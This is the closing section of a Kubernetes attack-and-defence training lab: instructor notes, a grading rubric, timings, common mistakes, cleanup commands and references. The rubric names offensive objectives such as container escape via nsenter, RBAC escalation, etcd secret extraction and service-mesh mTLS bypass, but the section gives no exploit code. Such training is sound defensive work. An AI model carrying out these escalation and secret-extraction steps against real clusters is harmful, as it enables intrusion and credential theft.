Q: Why are multi-stage builds with distroless images important? A: Multi-stage builds separate the build environment (compilers, build tools, source code) from the runtime image. Distroless images contain only the application and its runtime dependencies — no shell, no package manager, no debugging tools. This reduces the attack surface from hundreds of packages to a minimal set, and makes post-exploitation significantly harder for an attacker.

Instructor Notes¶

Lab Facilitation Guide¶

Running This Lab

Group Exercise (recommended: 3–5 participants)

Split into red team and blue team
Red team works through Exercises 1–5
Blue team monitors Falco alerts and writes detection rules in real-time
Debrief after each exercise: what was detected? What was missed?

Individual Exercise

Work through exercises sequentially — each builds on the prior
Spend extra time on the detection sections — write your own rules before reading the answers
Use a local kind/minikube cluster — all exercises are self-contained

Assessment Criteria

Criterion	Points	Description
Container escape completed	15	Successfully escaped to host via nsenter
RBAC chain identified	20	Documented full escalation path
etcd secrets extracted	15	Extracted and decoded at least 3 secrets
Service mesh bypass demonstrated	15	Showed mTLS bypass and traffic mirroring
Supply chain risk documented	10	Trivy scan + admission control audit
Detection rules written	15	KQL/SPL/Falco rules for each exercise
Defensive recommendations	10	Actionable hardening for each finding
Total	100

Time Management

Exercise 1: 60–75 min (container escape is foundational)
Exercise 2: 60–75 min (RBAC chain requires careful enumeration)
Exercise 3: 45–60 min (straightforward once on control plane)
Exercise 4: 60–75 min (service mesh concepts may need introduction)
Exercise 5: 45–60 min (scanning tools do heavy lifting)

Common Mistakes¶

Watch Out For

Forgetting to check existing RBAC before escalating — always enumerate auth can-i --list first
Not documenting the attack chain — each step should be logged with timestamps
Skipping detection — the red team value is in the detection rules, not just the exploitation
Using real IPs or domains — all outputs must use RFC 5737 / *.example.com
Neglecting the defensive measures — each exercise's prevention controls are equally important as the attack steps

Cleanup¶

# Remove the lab cluster
$ kind delete cluster --name skyforge-lab
Deleting cluster "skyforge-lab" ...

# Verify cleanup
$ kind get clusters
No kind clusters found.

# Remove any local files
$ rm -f kind-config.yaml cosign.key cosign.pub secrets_dump.json novaplatform-openapi.json

References¶

Resource	URL
MITRE ATT&CK Containers Matrix	https://attack.mitre.org/matrices/enterprise/containers/
Kubernetes Security Documentation	https://kubernetes.io/docs/concepts/security/
CIS Kubernetes Benchmark	https://www.cisecurity.org/benchmark/kubernetes
Falco Rules Repository	https://github.com/falcosecurity/rules
kube-hunter	https://github.com/aquasecurity/kube-hunter
peirates	https://github.com/inguardians/peirates
Trivy	https://github.com/aquasecurity/trivy
Istio Security Best Practices	https://istio.io/latest/docs/ops/best-practices/security/
Cosign / Sigstore	https://github.com/sigstore/cosign
Kubernetes RBAC Good Practices	https://kubernetes.io/docs/concepts/security/rbac-good-practices/
etcd Encryption at Rest	https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
NSA/CISA Kubernetes Hardening Guide	https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF

Lab 26 is part of the Nexus SecOps Labs series. Complete Lab 13 (Cloud Red Team) first for foundational cloud attack knowledge before attempting this lab.